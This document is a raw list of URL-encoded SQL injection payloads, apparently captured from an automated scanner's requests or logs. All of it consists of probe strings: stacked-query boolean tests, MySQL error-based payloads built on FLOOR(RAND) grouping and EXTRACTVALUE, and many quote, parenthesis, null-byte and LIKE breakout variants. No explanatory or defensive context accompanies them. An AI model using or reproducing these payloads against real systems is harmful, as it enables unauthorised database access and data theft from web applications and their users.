-8046%22%29%3B%20SELECT%20%28CASE%20WHEN%20%283309%3D4703%29%20THEN%203309%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9286%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%285786%3D4697%29%20THEN%205786%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9174%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8082%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%283200%3D9259%29%20THEN%203200%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5015%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%288546%3D5767%29%20THEN%208546%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9588%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5584%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%288653%3D2829%29%20THEN%208653%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2123%22%3B%20SELECT%20%28CASE%20WHEN%20%282861%3D3658%29%20THEN%202861%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6502%22%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1934%22%3B%20SELECT%20%28CASE%20WHEN%20%283902%3D9062%29%20THEN%203902%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9383%25%27%29%3B%20SELECT%20%28CASE%20WHEN%20%282880%3D2649%29%20THEN%202880%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3082%25%27%29%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5883%25%27%29%3B%20SELECT%20%28CASE%20WHEN%20%286479%3D6530%29%20THEN%206479%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1973%25%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%281644%3D1763%29%20THEN%201644%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1814%25%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5014%25%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%282200%3D3896%29%20THEN%202200%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7011%25%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%284254%3D9837%29%20THEN%204254%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3123%25%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3968%25%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%281933%3D6303%29%20THEN%201933%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6989%25%27%3B%20SELECT%20%28CASE%20WHEN%20%281963%3D4363%29%20THEN%201963%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7645%25%27%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3565%25%27%3B%20SELECT%20%28CASE%20WHEN%20%288141%3D9493%29%20THEN%208141%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7964%00%27%29%3B%20SELECT%20%28CASE%20WHEN%20%288660%3D6091%29%20THEN%208660%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4166%00%27%29%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8343%00%27%29%3B%20SELECT%20%28CASE%20WHEN%20%288885%3D4477%29%20THEN%208885%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5075%00%27%3B%20SELECT%20%28CASE%20WHEN%20%289737%3D7388%29%20THEN%209737%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7956%00%27%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1134%00%27%3B%20SELECT%20%28CASE%20WHEN%20%282651%3D7093%29%20THEN%202651%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5324%27%29%20WHERE%204864%3D4864%3B%20SELECT%20%28CASE%20WHEN%20%289194%3D6718%29%20THEN%209194%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7667%27%29%20WHERE%201989%3D1989%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7310%27%29%20WHERE%202199%3D2199%3B%20SELECT%20%28CASE%20WHEN%20%284046%3D3825%29%20THEN%204046%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7467%22%29%20WHERE%201899%3D1899%3B%20SELECT%20%28CASE%20WHEN%20%289765%3D9230%29%20THEN%209765%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1690%22%29%20WHERE%208511%3D8511%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5929%22%29%20WHERE%202098%3D2098%3B%20SELECT%20%28CASE%20WHEN%20%289390%3D1744%29%20THEN%209390%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7664%27%20WHERE%208505%3D8505%3B%20SELECT%20%28CASE%20WHEN%20%282109%3D7986%29%20THEN%202109%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2245%27%20WHERE%209636%3D9636%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6687%27%20WHERE%207282%3D7282%3B%20SELECT%20%28CASE%20WHEN%20%281306%3D2425%29%20THEN%201306%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9634%22%20WHERE%209929%3D9929%3B%20SELECT%20%28CASE%20WHEN%20%287452%3D1054%29%20THEN%207452%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1656%22%20WHERE%209760%3D9760%3B%20SELECT%20%28CASE%20WHEN%20%287315%3D7315%29%20THEN%207315%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7473%22%20WHERE%207654%3D7654%3B%20SELECT%20%28CASE%20WHEN%20%285960%3D7297%29%20THEN%205960%20ELSE%201%2F%28SELECT%200%29%20END%29-- 1%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%288255%3D8255 1%29%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%282846%3D2846 1%29%29%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%281126%3D1126 1%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1%29%20WHERE%209604%3D9604%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 1%20WHERE%206509%3D6509%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 1%27%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1%27%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1%22%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1%27%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27uNsM%27%3D%27uNsM 1%27%29%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27xSfY%27%3D%27xSfY 1%27%29%29%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27ONZB%27%3D%27ONZB 1%27%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27gzLH%27%3D%27gzLH 1%27%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27dlbt%27%20LIKE%20%27dlbt 1%27%29%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27xhdG%27%20LIKE%20%27xhdG 1%27%29%29%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27PuRo%27%20LIKE%20%27PuRo 1%27%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27gBQh%27%20LIKE%20%27gBQh 1%22%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22NfLV%22%3D%22NfLV 1%22%29%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22UGYP%22%3D%22UGYP 1%22%29%29%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22ehlX%22%3D%22ehlX 1%22%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22FPKf%22%3D%22FPKf 1%22%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22UHYW%22%20LIKE%20%22UHYW 1%22%29%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22nxoN%22%20LIKE%20%22nxoN 1%22%29%29%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22JTuT%22%20LIKE%20%22JTuT 1%22%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22xKxY%22%20LIKE%20%22xKxY 1%25%27%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27Ridr%27%3D%27Ridr 1%00%27%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27giBs%27%3D%27giBs 1%27%29%20WHERE%203526%3D3526%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 1%22%29%20WHERE%204670%3D4670%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 1%27%20WHERE%206768%3D6768%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 1%22%20WHERE%202436%3D2436%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 1%27%7C%7C%28SELECT%20%27xmXN%27%20FROM%20DUAL%20WHERE%203461%3D3461%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27OsGs%27%20WHERE%205418%3D5418%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%7C%7C%27 1%27%2B%28SELECT%20OFSa%20WHERE%201222%3D1222%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%2B%27 1%27%2B%28SELECT%20%27bLlb%27%20WHERE%204914%3D4914%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%20%28SELECT%207853%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287853%3D7853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%23 1%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29 1%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%284704%3D4704 1%29%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%285347%3D5347 1%29%29%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%286171%3D6171 1%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29 1%29%20WHERE%205172%3D5172%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20--%20 1%20WHERE%202498%3D2498%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20--%20 1%27%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29 1%27%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29 1%22%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29 1%27%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%27ZJgM%27%3D%27ZJgM 1%27%29%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%27kGgr%27%3D%27kGgr 1%27%29%29%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%28%27VfmA%27%3D%27VfmA 1%27%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%27zzBC%27%3D%27zzBC 1%27%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%27UKMX%27%20LIKE%20%27UKMX 1%27%29%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%27iaku%27%20LIKE%20%27iaku 